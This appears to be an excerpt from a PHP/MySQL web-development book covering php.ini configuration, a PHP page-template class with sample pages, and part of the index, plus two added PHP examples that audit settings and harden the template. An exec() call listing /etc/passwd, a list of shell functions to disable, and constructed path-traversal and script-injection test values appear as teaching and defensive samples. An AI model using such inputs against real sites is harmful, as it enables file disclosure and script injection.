The php_value directive applies changes to the PHP configuration. For 
example, if you had a site that needed to upload large files, you could set the 
upload_max_filesize PHP directive like so: 

php_value upload_max_filesize 100M 

The directive won’t be applied server-wide, but rather, only to the files or site 
to which the php_value directive applies. When you use an .htaccess file, 
the change is applied immediately. If you make the change in the Apache 
configuration file, then the Apache server needs to be reloaded for the 
change to take effect. 

Making changes in PHP 

PHP offers two configuration-related functions that are useful for this 
discussion: ini_get() and ini_set(). The ini_get() function retrieves the 
current value of a given configuration directive, and ini_set() sets the 
value. For example: 

ini_set('upload_max_filesize','100M'); 


Understanding Common Configuration Changes 

The remainder of this chapter looks at some common configuration changes 
that you might need for a server running PHP. 

Changing session timeout 

When you use sessions for your application, the data is typically stored 
in files on the server (though this too can be configured in the php.ini). 
Sessions are affected by a garbage collection process that cleans up any 
dead sessions, such as those that haven’t been used for a certain number 
of minutes. 

By default, the garbage collection process looks at sessions with a lifetime of 
1,440 seconds. This means that the user needs to be idle for 1,440 seconds, 
and on the next attempt, his session may or may not be expired. 

A common change is to adjust that garbage collection lifetime, typically to 
lengthen it. This change is typically implemented in the server-wide 
configuration but may apply at the site level too. 

The php.ini setting to control this behavior is 

session.gc_maxlifetime = 1440 

Changing other session parameters 

Numerous other parameters can be set to control how sessions behave. 
Things like where session files are saved on the server and whether they 
use cookies are available to be changed. Some of the more common changes 
include setting the domain for the session cookie and the name of the session. 

Both of these are typically set at the site level. The default value for the 
cookie_domain is empty, as reflected here: 

session.name = PHPSESSID 
session.cookie_domain = 

Disabling functions and classes 

You can use the php.ini to disable built-in functions or classes. You might 
find that you don’t want people using certain PHP functions or there might 
be a security vulnerability discovered in a certain function. In any event, you 
can disable the function or class using these directives: 

disable_functions = 
disable_classes = 

Each directive expects a comma-separated list of functions or classes to 
be disabled. For example, you might want to disable the exec() function. 
Listing 1-1 shows a simple PHP page to test this functionality. 


Listing 1-1: A Simple PHP Page with exec() 

<?php 

$passwd = exec("ls -la /etc/passwd"); 
print "{$passwd}<br />\n"; 

?> 


When viewed in a browser, the page looks like that in Figure 1-1. 


Figure 1-1: Using the exec() function to view a file's listing. 

Changing the php.ini to disable that function means using this directive: 

disable_functions = exec 

Once Apache is restarted, the change will take effect. Reloading the page 
now results in the warning shown in Figure 1-2. 





Figure 1-2: The exec() function has been disabled. The page displays 
"Warning: exec() has been disabled for security reasons". 

If you’re using a hosting provider, the exec() function may already be 
disabled. Also, you may not see the warning from Figure 1-2 if your PHP 
configuration doesn’t display errors. 

Changing error display 

There are several configuration directives around the error display for PHP. 
For example, a development server would likely display errors at all times. 
This is set with the display_errors directive: 

display_errors = On 

A production server would likely never display errors to the user: 

display_errors = Off 

A related directive is the error_reporting directive. This complex directive 
informs PHP what to display for errors. You can configure PHP to report 
only errors that are fatal or you can display more minor errors like notices. 

The error_reporting directive is somewhat complex. See 
http://php.net/error-reporting for more information if you need to change this 
directive. 

Changing resource limits 

There are times when you need to change the maximum file size allowed, 
for when the file is received through a form POST or uploaded directly or 
received in another way altogether. The upload_max_filesize directive 
sets the maximum file size that can be uploaded, while the post_max_size 
directive sets the maximum size of a form POST. If you allow forms to upload 
files, chances are you need to change both directives. 

Additionally, you may find that you need to change the memory limits 
imposed on a given PHP script or the execution time that a script runs. For 
example, if a user is uploading a large file, it may take several minutes. The 
memory_limit directive sets the amount of memory that can be used by a 
PHP program, and the max_execution_time directive sets how long a 
program can run. 

You can change the maximum time for a script by changing the 
max_execution_time in the php.ini or by using the set_time_limit() 
function within an individual script. The set_time_limit() function is a 
common way to solve the problem of a long-running script while preserving 
the server-wide max_execution_time directive’s value. 
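
A check of the directives covered in this chapter (disable_functions, display_errors, and the upload, POST and memory limits), written as an added example and not taken from the book. The function names iniBytes and auditPhpConfig, the list of functions expected to be disabled, and the sample values are assumptions; the size relationships it tests follow the PHP manual's guidance that post_max_size must exceed upload_max_filesize and memory_limit should exceed post_max_size.

```php
<?php
// Added example, not from the book: audits the php.ini directives this
// chapter discusses. All sample values below are constructed.

// Convert php.ini shorthand ("100M", "2G", "512K") to bytes; -1 means no limit.
function iniBytes(string $value): int
{
    $value = trim($value);
    if ($value === '') {
        return 0;
    }
    if ($value === '-1') {
        return -1;
    }
    $num = (int) $value;                 // "100M" casts to 100
    switch (strtoupper(substr($value, -1))) {
        case 'G':
            $num *= 1024;                // fall through
        case 'M':
            $num *= 1024;                // fall through
        case 'K':
            $num *= 1024;
    }
    return $num;
}

// Return a list of findings for an array of directive => value pairs.
function auditPhpConfig(array $ini, array $mustDisable = ['exec']): array
{
    $findings = [];

    // disable_functions is a comma-separated list of function names.
    $disabled = array_filter(
        array_map('trim', explode(',', $ini['disable_functions'] ?? ''))
    );
    foreach (array_diff($mustDisable, $disabled) as $fn) {
        $findings[] = "disable_functions does not list {$fn}";
    }

    // A production server should not display errors to the user.
    $display = strtolower(trim((string) ($ini['display_errors'] ?? '')));
    if (in_array($display, ['1', 'on', 'true', 'yes', 'stdout', 'stderr'], true)) {
        $findings[] = "display_errors is enabled";
    }

    // An uploaded file travels inside a form POST, so the POST limit has to
    // be at least as large as the upload limit (0 means no POST limit).
    $upload = iniBytes($ini['upload_max_filesize'] ?? '0');
    $post   = iniBytes($ini['post_max_size'] ?? '0');
    if ($post > 0 && $post < $upload) {
        $findings[] = "post_max_size is smaller than upload_max_filesize";
    }

    // The script needs room to hold the POST data it receives.
    $memory = iniBytes($ini['memory_limit'] ?? '-1');
    if ($memory !== -1 && $post > 0 && $memory < $post) {
        $findings[] = "memory_limit is smaller than post_max_size";
    }

    return $findings;
}

// Constructed sample: values as they might appear in a php.ini under review.
$sample = [
    'disable_functions'   => 'passthru, system',
    'display_errors'      => 'On',
    'upload_max_filesize' => '100M',
    'post_max_size'       => '8M',
    'memory_limit'        => '128M',
];
print_r(auditPhpConfig($sample));

// The same audit against the interpreter running this script.
$live = [];
foreach (array_keys($sample) as $name) {
    $live[$name] = (string) ini_get($name);
}
print_r(auditPhpConfig($live));

// ini_set() returns false when a directive cannot be changed at run time.
// upload_max_filesize is one of those (PHP_INI_PERDIR): set it in php.ini,
// the VirtualHost container, or .htaccess. memory_limit can be set here.
// disable_functions can be set only in php.ini itself.
var_dump(ini_set('upload_max_filesize', '100M'));
var_dump(ini_set('memory_limit', '256M'));
```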

Chapter 2: Building a Templating System 


In This Chapter 

Understanding how templates simplify global changes 
Building a template 


This chapter looks at template systems and how they can reduce the 
amount of work that you need to do to make a website. We tell you how 
to build a template that’s both simple and powerful for many uses, style the 
page, and then extend the template to other pages on the site. 


After working your way through this chapter, you could further extend the 
templating system to add more specialized pages or even further abstract 
it so that you can add CSS and JavaScript elements on the fly, rather than 
through individual external files. 


Understanding Template Systems 

When you make a website, you frequently use the same layout for the entire 
site. You have a top portion, maybe with a menu; a main content area; 
and a bottom part, maybe with links or a copyright notice. Each and every 
page needs the same CSS and HTML to create this integrated look and feel 
throughout the website. 

When your website has only a couple pages, it’s probably fine to keep the 
HTML and CSS separate. If you need to make a change, say to add a menu 
item or change the copyright year, you can just edit each file. But imagine 
if your website has dozens or even hundreds of pages. Now changing that 
copyright year or adding a menu item (or whatever) becomes quite a task. 
Making global changes like that, without a template, requires you to edit 
every file to make that change and ensure that you don’t make a mistake or 
typo in one of those edits. 

Enter templates. A template is simply a file that contains standard or 
boilerplate information used to create other files. Templates are a way to reduce 
repeated code. For example, you can make a top portion and a bottom portion 
of the page that are common among your pages. You can easily include 
the header and footer on each page, and then if you need to make a global 
change to one of these areas, you make the change only once and it applies 
to all the common headers or footers. 



Not everything can be part of a template or is a good candidate for being a 
part of a template system. Areas of pages that are common across multiple 
pages, like the header or footer, are good candidates and can be templated 
easily. However, the main content area, which is typically different on every 
page, can’t really be templated. 


Building a PHP Template 

The remainder of the chapter builds a template system using PHP, along 
with the normal HTML, CSS, and JavaScript that go into a page. For this 
chapter, you build a simple HTML page. When you’re done, you will be able 
to create a page that looks like Figure 2-1. 


Figure 2-1: Converting a page into a template system. 


This page has a header section containing a navigational menu with links to 
Home, About, and Contact Me. The page also has a main content area and a 
footer. 

Creating a template class 

The heart of the template system is a PHP class that’s responsible for 
gathering together the various parts of a given page. The Page class includes a few 
methods and properties. You instantiate the Page class as part of building 
each page. Follow these steps for this exercise: 

1. Open your text editor and create a new empty file. 

2. Place the following PHP code in the file: 

<?php 

class Page 
{ 
    public $type = "default"; 
    public $title = "My Web Site"; 
    public $titleExtra = ""; 

} //end Page class 

?> 

3. Save the file as classPage.php in your document root. 

Look how the first part of this code breaks down. The class Page is created 
and these three properties are declared: 

♦ Type: This corresponds to the type of page being displayed. By adding 
a type property, you can change the behavior of the various methods 
based on whether the type is default or another type. (This example has 
only a default type.) 

♦ Title: This appears in the browser’s menu bar. 

♦ Extra title: Use this for additional pages, so that the pages can have 
different titles. 

Creating the top of the page 

The top of the page is one of the more complex sections for a template system 
to handle. The top of a web page contains the document type declaration 
(DTD) along with links to the CSS and any JavaScript that will be used on the 
page. The top of the page also contains the title and other meta information 
about the page. 

Aside from the information in the <head> section of a page, the top of the 
page that you’re using in this chapter as an example also contains the menu 
in Figure 2-1, with the links to other pages on the site. 

The class that you will create in the initial exercise for this chapter has four 
methods for the top of the page, including both the <head> section and the 
menu. However, when using the class, you don’t want to have to call (or 
remember to call) all the various methods in the correct order to create the 
top section of the page. All you care about is that you create a top section 
of the page. Therefore, there’s only one public method, called getTop. The 
getTop method is responsible for gathering all the bits to make the entire 
top of the page. 
1. Open classPage.php if it isn’t already open. 

2. Within classPage, just below the public $titleExtra = ""; line, 
enter the following code: 

    public function getTop() { 
        $output = ""; 
        $output .= $this->_getDocType(); 
        $output .= $this->_getHtmlOpen(); 
        $output .= $this->_getHead(); 
        $output .= file_get_contents("pageTop.txt"); 
        return $output; 
    } //end function getTop() 

3. Save classPage.php. 

The getTop() method creates a variable for the output. This gives 
flexibility to add to or remove from the variable as you need to. The method 
calls three additional methods, grabs some plain HTML from a file called 
pageTop.txt, and returns the output. 

4. Within classPage.php (open it if it isn’t already), below the 
getTop() method’s closing brace, enter the following code: 

    protected function _getDocType($doctype = "html5") { 
        if ($doctype == "html5") { 
            $dtd = "<!DOCTYPE html>"; 
        } 
        return $dtd . "\n"; 
    } 

    protected function _getHtmlOpen($lang = "en-us") { 
        if ($lang == "en-us") { 
            $htmlopen = "<html lang=\"en\">"; 
        } 
        return $htmlopen . "\n"; 
    } 

    protected function _getHead() { 
        $output = ""; 
        $output .= file_get_contents("pageHead.txt"); 
        if ($this->titleExtra != "") { 
            $title = $this->titleExtra . "|" . $this->title; 
        } else { 
            $title = $this->title; 
        } 
        $output .= "<title>" . $title . "</title>"; 
        $output .= "</head>"; 
        return $output; 
    } //end function _getHead() 

The three methods that you add in Step 4 are responsible for building the 
<head> section of the page. The first method, _getDocType, returns the 
DTD, which for your case will be HTML5, but could be any other valid 
document type. 

DTDs tell the browser what type of document to expect and what rules that 
document will honor. This helps the browser to make decisions about how 
to display the document. 

The next method called is _getHtmlOpen(), which creates the <html> 
element of the page and sets the language. Like other methods, the language 
can be customized here if need be. 

The final method called is the _getHead() method. This method incorporates 
another file, called pageHead.txt. The pageHead.txt file includes links 
to CSS and JavaScript. Remember that $type property that’s set in the Page 
class? Here’s one place where you might use it. If you have a special page 
type that requires additional CSS or JavaScript, you could add a conditional 
statement here like, “If type is special, then use pageSpecialHead.txt.” 

The _getHead() method is also where the title of the page is set; if the 
$titleExtra property is set, then it gets used here too. 

Now you have the capability to build the top of the page, or close to it, 
anyway, because you still need the code for those two text files, 
pageHead.txt and pageTop.txt. You create those using the following steps. 

1. Create a new empty file in your text editor. 

2. Inside of the file, enter the following markup: 

<head> 
<link rel="stylesheet" href="style.css" type="text/css" /> 

3. Save the file as pageHead.txt in your document root and resist the 
temptation to close that <head> element! 

The <head> element is opened in this file (though it could also be opened 
inside of the _getHead() method). However, because you need to add 
other elements, like the title, to the <head> section, don’t close the <head> 
element in this file. Instead, leave that for the _getHead() method to do. 
This gives you the greatest flexibility for changes and additions later. 

1. Create a new empty file in your text editor. 

2. Inside of the file, add the following markup: 

<body> 
<div id="menu"> 
<ul> 
<li><a href="home.php">Home</a></li> 
<li><a href="about.php">About</a></li> 
<li><a href="contact.php">Contact Me</a></li> 
</ul> 
</div> <!-- end menu --> 

3. Save the file as pageTop.txt in your document root. 

Creating the bottom of the page 

With the top of the page created in template form, create the bottom by 
following these steps. 

1. Open classPage.php if it isn’t already opened. 

2. Within classPage.php, place the following code, below the closing 
brace for the _getHead() method: 

    public function getBottom() { 
        return file_get_contents("pageBottom.txt"); 
    } //end function getBottom() 

3. Save the file. 

This code simply retrieves the contents of a file called pageBottom.txt. 
Now’s as good a time as any to build that file. Follow these steps: 

1. Create a new empty file within your text editor. 

2. Within the file, place the following HTML: 

<div id="footer"> 

Copyright (c) 2013 Steve Suehring. 

</div> <!-- end footer --> 

</body> 

</html> 

3. Save the file as pageBottom.txt in your document root. 

Connecting the top, bottom, and middle 

The final classPage.php file should look like Listing 2-1. 

Listing 2-1: The Final classPage.php File 

<?php 

class Page 
{ 
    public $type = "default"; 
    public $title = "My Web Site"; 
    public $titleExtra = ""; 

    public function getTop() { 
        $output = ""; 
        $output .= $this->_getDocType(); 
        $output .= $this->_getHtmlOpen(); 
        $output .= $this->_getHead(); 
        $output .= file_get_contents("pageTop.txt"); 
        return $output; 
    } //end function getTop() 

    protected function _getDocType($doctype = "html5") { 
        if ($doctype == "html5") { 
            $dtd = "<!DOCTYPE html>"; 
        } 
        return $dtd . "\n"; 
    } 

    protected function _getHtmlOpen($lang = "en-us") { 
        if ($lang == "en-us") { 
            $htmlopen = "<html lang=\"en\">"; 
        } 
        return $htmlopen . "\n"; 
    } 

    protected function _getHead() { 
        $output = ""; 
        $output .= file_get_contents("pageHead.txt"); 
        if ($this->titleExtra != "") { 
            $title = $this->titleExtra . "|" . $this->title; 
        } else { 
            $title = $this->title; 
        } 
        $output .= "<title>" . $title . "</title>"; 
        $output .= "</head>"; 
        return $output; 
    } //end function _getHead() 

    public function getBottom() { 
        return file_get_contents("pageBottom.txt"); 
    } //end function getBottom() 

} //end class Page 

You’re ready to create a page with your new templating system. Follow these 
steps: 

1. Create a new empty file in your text editor. 

2. Inside of the file, enter the following code and HTML: 

<?php 

require_once("classPage.php"); 

$page = new Page(); 
print $page->getTop(); 
print <<<EOF 
<div id="mainContent"> 

<p>This is where content would go, should there be 
any.</p> 

</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 


?> 

3. Save the file as home.php in your document root. 

This file instantiates a new instance of the Page class and then calls the 
getTop() method. With that done, the page being built will have everything 
it needs right up to the main content area. The main content area is 
provided in this file and is denoted with the print <<<EOF heredoc statement. 
This type of statement tells PHP to just simply output whatever follows right 
up until it sees the closing EOF, which appears on its own line, left-justified. 

Finally, the getBottom() method is called to round out the page. 

It’s time to view the page. Open your web browser and point to 
http://localhost/home.php. When viewed in a web browser, the page looks like 
that in Figure 2-2. 

Figure 2-2: The page, being served from a templating system. 


You may notice that the page shown in Figure 2-2 doesn’t look like that in 
Figure 2-1. You can tidy that up with a bit of CSS. Here are the steps: 

1. Create a new empty text file in your editor. 

2. Place the following CSS in the file: 

#menu { 
    height: 20%; 
    border: 2px solid black; 
} 

#menu ul { 
    text-align: center; 
} 

#menu ul li { 
    display: inline; 
    list-style-type: none; 
    padding-right: 10px; 
} 

body { 
    font-family: arial, helvetica; 
} 

#footer { 
    text-align: center; 
    margin-top: 150px; 
    padding: 20px; 
    height: 15%; 
    border: 1px solid black; 
} 

3. Save the file as style.css in your document root. 

4. Reload the home.php page in your browser. 

The page now looks like that in Figure 2-1. 


Extending the Template 

With the first page built, you can turn your attention to another page for the 
site. The page you built links to two other pages, About and Contact Me, so 
now it’s time to build those two. 

Building an About page 

Building an About page is a simple matter of creating a new file, instantiating 
the Page class, and adding content. Follow these steps: 

1. Create a new empty file in your editor. 

2. In the file, place the following code: 

<?php 

require_once("classPage.php"); 

$page = new Page(); 

$page->titleExtra = "About"; 
print $page->getTop(); 
print <<<EOF 
<div id="mainContent"> 

<p>It's all about me.</p> 

</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 

?> 

3. Save the file as about.php in your document root. 

4. View the page in your browser by going to http://localhost/about.php. 

The page should look like Figure 2-3. Notice the new title bar, as 
compared to Figure 2-2. 

Figure 2-3: Creating a new page with the templating system. 

Looking at the code that you created in this exercise, notice that it’s similar 
to the code for the home page. The only changes are to set the titleExtra 
property and to change the actual HTML content of the page. That’s 
the beauty of templating systems: You can now create many, many pages, 
quickly and easily. If you need to change something or add a new menu 
item, you can do so in one location and it will automatically and instantly be 
updated across all the pages. 

Building a Contact page 

Contact pages for websites sometimes include other elements, maybe a form 
or another way to interact. This means you might need to include another 
JavaScript file or different CSS. Luckily, you can do so by extending the 
templating class and using that type property discussed throughout this 
chapter. Follow these steps to create the Contact page: 

1. Open classPage.php. 

2. Inside of the _getHead() method, add a conditional for a new type of 
page. 

The entire _getHead method should look like this: 

    protected function _getHead() { 
        $output = ""; 
        if ($this->type == "contact") { 
            $output .= file_get_contents("pageHeadContact.txt"); 
        } else { 
            $output .= file_get_contents("pageHead.txt"); 
        } 
        if ($this->titleExtra != "") { 
            $title = $this->titleExtra . "|" . $this->title; 
        } else { 
            $title = $this->title; 
        } 
        $output .= "<title>" . $title . "</title>"; 
        $output .= "</head>"; 
        return $output; 
    } //end function _getHead() 

This code checks to see if the type property ($this->type) is set to 
contact. If it is, then a new <head> section file is included. Otherwise, 
the normal <head> section is included. 

3. Save classPage.php. 

4. Create a new empty file in your text editor. 

5. Inside of the file, add the following markup: 

<head> 
<link rel="stylesheet" href="style.css" type="text/css" /> 
<link rel="stylesheet" href="contact.css" type="text/css" /> 
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"></script> 

6. Save the file as pageHeadContact.txt in your document root. 

7. Create a new empty file in your text editor. 

8. Inside of the file, place the following CSS: 

.contactMethod { 

font-style: italic; 
font-weight: bold; 

} 

9. Save the file as contact.css in your document root. 

10. Create a new empty file in your editor. 

11. Within the file, place the following code and HTML: 

<?php 

require_once("classPage.php"); 

$page = new Page(); 
$page->type = "contact"; 
$page->titleExtra = "Contact Me"; 

print $page->getTop(); 

print <<<EOF 
<div id="mainContent"> 
<h1>Contacting me is easy</h1> 
<p class="contactMethod">suehring@braingia.com</p> 
<p class="contactMethod">Twitter: @stevesuehring</p> 
</div> <!-- end main content --> 

EOF; 

print $page->getBottom(); 

?> 

12. Save the file as contact.php in your document root. 

13. View the file in your browser. 

It should look like Figure 2-4. 

Figure 2-4: The Contact page built using a template. 

14. Click through each link: Home, About, and Contact Me. 

The pages should work and link to each other. 
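
The head-building step of the template class, reworked as an added example that is not the book's classPage.php: the title is HTML-escaped before it goes into <title>, and the page type is looked up in a fixed map instead of growing the if/else or building a file name from $type. It assumes titleExtra or type could one day be filled from request data (the chapter sets both in code); the class name SafePage, the $headFiles map, the constructor argument, and the temporary fragment files are hypothetical.

```php
<?php
// Added example, not the book's code. SafePage and $headFiles are
// hypothetical names; the fragment files are constructed for the demo.

class SafePage
{
    public $type = "default";
    public $title = "My Web Site";
    public $titleExtra = "";

    // Allowlist: page type => head fragment. A type that is not a key here
    // falls back to the default, so $type never reaches file_get_contents().
    protected $headFiles = [
        "default" => "pageHead.txt",
        "contact" => "pageHeadContact.txt",
    ];

    protected $dir;

    public function __construct(string $dir)
    {
        $this->dir = $dir;
    }

    public function getHead(): string
    {
        $file = $this->headFiles[$this->type] ?? $this->headFiles["default"];
        $output = file_get_contents($this->dir . "/" . $file);

        if ($this->titleExtra != "") {
            $title = $this->titleExtra . "|" . $this->title;
        } else {
            $title = $this->title;
        }

        // Escape on output: markup inside the title is shown as text,
        // not interpreted by the browser.
        $output .= "<title>"
            . htmlspecialchars($title, ENT_QUOTES, "UTF-8")
            . "</title>";
        $output .= "</head>";
        return $output;
    }
}

// Constructed demo: write the two head fragments to a temporary directory.
$dir = sys_get_temp_dir() . "/tpl_" . bin2hex(random_bytes(4));
mkdir($dir);
$css = "<link rel=\"stylesheet\" href=\"%s\" type=\"text/css\" />\n";
file_put_contents("$dir/pageHead.txt", "<head>\n" . sprintf($css, "style.css"));
file_put_contents(
    "$dir/pageHeadContact.txt",
    "<head>\n" . sprintf($css, "style.css") . sprintf($css, "contact.css")
);

// A normal contact page picks up the contact fragment.
$page = new SafePage($dir);
$page->type = "contact";
$page->titleExtra = "Contact Me";
print $page->getHead() . "\n\n";

// Constructed hostile values: an unknown type and markup in the title.
$page = new SafePage($dir);
$page->type = "../../etc/passwd";
$page->titleExtra = "</title><script>alert(1)</script>";
print $page->getHead() . "\n";

// Remove the temporary files.
array_map("unlink", glob("$dir/*"));
rmdir($dir);
```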
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Symbols 

- (minus sign), 197, 290 

- special character, 324 

! (exclamation point), 332-333 
!=, <> comparison operator, 321 
!== comparison operator, 321 

# (pound sign), 131, 173 

$ (dollar sign), 282, 283, 324, 405 
$0 construct, 225, 227 
$_SESSlON arrays, 438 
$ fh variable, 384 
$result variable, 519 
$ (this) selector, 231 
$this variable, accessing properties 
with, 404-405 
% (modulus) sign, 290 
&# 160 ; entity, 100-101 
&nbsp; entity, 100-101 
() special character, 324 
(II) special character, 324 

* (asterisk), 197, 290, 324 
. (periods), 132, 294, 324 

• htaccess file, setting PHP options 

in,636 

/ (forward slash), 197, 290, 327 
: hover pseudoclass, 251 
? special character, 324 
@ symbol, 301, 315 
[ ] (square brackets), 296, 324 
\ (backslash), 292, 324, 327 
\n PHP character, 280-281, 293 
\ t PHP character, 293 
^ special character, 324 

_(two underscores), 407 

{,} special character, 324 
{} (curly braces), 208, 276-277, 278, 
284, 285 

+ (plus sign), 196, 289, 290, 324 
< comparison operator, 321 
<= comparison operator, 321 
= (equal sign), 194, 282 


== (equal operator), 421-422 
== comparison operator, 321 
=== (identical operator), 421-422 
=== comparison operator, 321 
> comparison operator, 321 
>= comparison operator, 321 
’ (single quote), 292 
“ “ (double quotes), 285 
‘ ‘ (single quotes), 285 

A 


a date format symbol, 309 
A date format symbol, 309 
a mode, 384 
a+ mode, 384 

<a> tag, 94, 108-109, 111-112 
About page, building, 650-651 
absolute versus relative links. 111 
abstract classes, 415-417 
abstract methods, 415-418 
access denied error message, 69 
access to databases, controlling, 
459-462 

accessing text files, with PHP, 
384-386 

accounts, MySQL 
adding, 465 

administrator responsibilities 
regarding, 458 
attributes of, 459 
names of, 460-461 
overview, 455, 462, 464 
passwords, 461, 465-466 
privileges, 461-462, 466-467 
removing, 467-468 
viewing information about, 464 
action attribute, 172-173 
add_numbers function, 350-351 
addBorder class, 143 
addClass () function, 239 
addNumbers function, 205-207 
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AddType statements, 47-48, 49 
administration of MySQL 
accounts, setting up, 462, 464-468 
administrator responsibilities, 
457-458 

backing up databases, 468-471 
controlling access to data, 
459-462 

default root account, 458 
overview, 457 
restoring data, 471-473 
upgrading MySQL, 473 
alert {) function, 204, 262 
alerts, 191-193, 262 
aligning web form fields with CSS, 
180-183 

ALL privilege, 462 
all-in-one installation kits 
for Apache, 24 
for MySQL, 59 
for PHP, 38-39 
XAMPP installation kit 
Control Panel, using, 78-79 
installing, 76-78 
obtaining, 75-76 
overview, 24, 38, 59, 75 
reinstalling, 84-85 
testing, 79-82 
troubleshooting, 85 
uninstalling, 84-85 
alt attribute, 114 
ALTER privilege, 462 
ALTER Statement, 494-495, 514 
Amazon, 541 

anchor tag, 94, 108-109, 111-112 
and, in comparisons, 327-329 
anonymous function, 225 
antivirus utilities, 434 
Apache 

advantages of, 14 
checking version of, 42 
configuring, 32-33, 83-84 
configuring for PHP, 47-48, 49 
getting information on, 31 
installing on local computers, 
19-20 


installing PHP on Linux or 
Unix with, 41 
obtaining, 22-24 
overview, 8, 21, 273 
PHP compatability with, 273 
running as service, 85 
securing, 426-427 
starting and stopping, 28-30 
testing web servers, 21-22 
verifying downloaded files, 24-25 
version of, checking, 41 
XAMPP Control Panel, starting and 
stopping with, 78-79 
Apache option, configure command, 
43 

Apache VirtualHost container, 636 
Apache website, obtaining Apache 
from, 23 

apachectl script, 29 
append () function, 228-229 
apxs utility, 40, 42, 43, 44 
arguments, adding to functions, 204 
arithmetic operations on numeric data 
types, 289 

arithmetic operators, 290-291 
arraY_key_exists {) function, 538 
arrays 

$_SESSION, 438 
creating, 296-297 
getting values from, 301-302 
holding multiple values in, 195 
for loops, 202-203 
multidimensional, 305-306 
overview, 288, 296 
reading files into, 388-389 
removing values from, 299 
sorting, 299-301 
viewing, 298-299 

walking through values in, 302-305 
arsort function, 301 
ASCII code, 321, 380 
asort function, 300, 301 
assigning 

strings to variables, 292 
timestamps to PHP variables, 

309-310 

values to PHP variables, 282-283 
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asterisk (*), 197, 290, 324 
attacks, handling, 429-432, 433 
attr () function, 233, 234, 236, 238 
attributes 
action, 172-173 
alt, 114 

database, 478-479 
href, 108 
HTML, 108 
id, 177, 182 
maxsize, 173 
method, 172 
name, 112, 177, 178 
in OOP, 399 
selected, 175, 176 
setting, 232-237 
size, 173 
src, 113, 190, 234 
target, 112 
value, 173-174 

authenticate function, 610, 611 
authenticated pages, adding, 
612-618 

AUTO_INCREMENT field, 524 
auto_prepend_f ile function, 
531-532 

B 


background colors, changing, 
147-150 

background images, 113, 150-154 
background-color CSS 
property, 147 

background-image CSS property, 
150-154 

background-position CSS 
property, 153 
backing up 

databases, 458, 468-471 
by web-hosting companies, 17 
backslash (\), 292, 327 
backticks, 372, 373-374 
ball objects, creating, 208 


basename function, 367 
basic selectors, jQuery, 226 
beginning statements, in for 
loops, 337 

BIGINT data type, 483 
binary files, 23, 37, 58, 380 
bindir=DIR option, PHP, 45 
blank account names, 460 
blank fields, checking for on web 
forms, 246-247 
blank hostnames, 461 
blank web pages, troubleshooting, 53 
block-level elements, 98, 160 
blocks, 276-278 

body section, HTML documents, 94 
<bodY> element, 130 
Boolean data type, 288, 295-296 
borderClass class, 238-239 
borders 

adding to HTML tables, 107-108 
CSS, 140-144 

bottom of page, in templates, 646 
<br> tag, 94, 99-100 
break statements, 334, 335, 344-346 
breaking out of loops, 344-346 
browser cookies 
checking if enabled, 438-440 
overview, 438 

browser detection, 214-216 
browsers 
defined, 7 

detecting with JavaScript, 214-216 
fonts, choosing web-friendly, 
138-140 

general discussion, 8 
JavaScript support, 188, 220 
on mobile devices, 10 
redirecting to other pages, 216-217 
testing CSS across multiple, 

122-123 

brute force attack, 461 

built-in PHP functions, 356, 637-638 

bullet styles, 145-146 
C syntax, 277
calling functions, 204-205 
Can’t connect to ... error message, 70
Cascading Style Sheets (CSS) 
advantages of, 122 
background colors, changing, 
147-150 

background images, adding, 150-154 

borders, 140-144 

classes, 131-134 

comments, 132 

external style sheets, 128-129 

font color, setting, 138-140 

font family, setting, 134-136 

font size, setting, 136-138 

footers, 163-167 

on forms, reviewing, 561-562 

general discussion, 11, 121-122 

headers, 163-167 

hiding elements, 161 

inline, 122-126 

internal style sheets, 126-128 
jQuery, changing with, 237-240 
limitations of, 122-123 
list styles, 144-147 
matching cases with HTML, 131 
overview, 121 

for registration pages, 597-598 
single-column layout, creating, 
155-158 
targeting styles 
background colors, changing, 
147-150 

groups of elements, 131-134 
individual elements, 130-131 
overview, 128-129 
selecting HTML elements, 130 
two-column layout, creating, 

159-162 

web form fields, aligning with, 
180-183 


case sensitivity 
with JavaScript, 194 
jQuery, 226 

matching CSS with HTML, 131 
PHP statements, 276 
PHP variables, 282 
SQL, 451-452 
cast, 288 
catch block, 420 
CDN-hosted jQuery, 220, 222-223 
CGI (Common Gateway Interface), 427
chaining, 230 

changeImage() function, 237
CHAR data type, 483 
character data, storing, 481-482 
character encoding, 119 
character input in text boxes 
counting characters in, 254-257 
preventing, 257-259 
character strings 
assigning to variables, 292 
double-quoted, 292-294 
joining, 294 
overview, 288, 292 
single-quoted, 292-294 
SQL queries, 452 
storing long, 295 

checkboxes, 170, 176-177, 579-580 
child classes, 400, 415-417 
circle list style, 144 
class methods, building, 628-632 
class statements, 402, 403 
class_exists function, 422 
classes 

$this variable, accessing properties 
with, 404-405 
abstract, 415-417 
benefits of, 534-535 
class statements, writing, 403 
constructor, writing, 409-410 
CSS, 131-134
disabling, 637-638 
getting information about, 422-423 
methods, adding, 405-407 
overview, 398-399, 402
preventing changes to, 418 
private properties and methods, 
407-409 

properties, setting, 403-404 
public properties and methods, 
407-409 

simplifying, 410-413 
template, creating, 642-643 
User, building, 607-610 
using in scripts, 413-415 
clear CSS property, 157 
clearing web forms, 180 
CLI (command line interface), 453
click event handlers, 247-251 
click() function, 250
client does not support 
authentication protocol 
error message, 69-70 
client software, 453 
client-server model, 7 
client-side validation, 555, 556 

__clone method, 420-421

closing tags, 91 
closing text files, 386 
color 

of background, changing, 147-150 
of font, setting with CSS, 138-140 
hex codes for, 137-138 
columns_priv table, 463 
comma-delimited files 
adding data to databases, 500 
creating, 391 
overview, 389-391 
reading, 391 

command line interface (CLI), 453
comma-separated values (CSV) files 
converting to TSV files, 392-393 
creating, 391 
overview, 389-391 
reading, 391 


comments 
CSS, 132 
HTML, 101-102 
JavaScript, 193, 262-264 
PHP, 316-318 

commercial licenses for MySQL, 58 
Common Gateway Interface (CGI), 427 
Community Server, 57 
company websites, web hosting for, 
15-16 

comparing objects, 421-422 
comparison operators, 320-322 
complex statements, 276-277, 319 
computers, setting up for web 
development 
MySQL, installing, 20 
overview, 19 
PHP, installing, 20 
web servers, installing, 19-20 
concatenation, 196, 294 
conditional blocks, 276-277 
conditional statements 
in for loops, 338 
if statements, 330-333 
overview, 319, 329-330 
switch statements, 329, 333-335 
conditionals, 197-200 
conditions, setting up 
comparing values, 320-322 
joining multiple comparisons, 
327-329 
overview, 320 

pattern matching with regular 
expressions, 323-327 
testing variable content, 322 
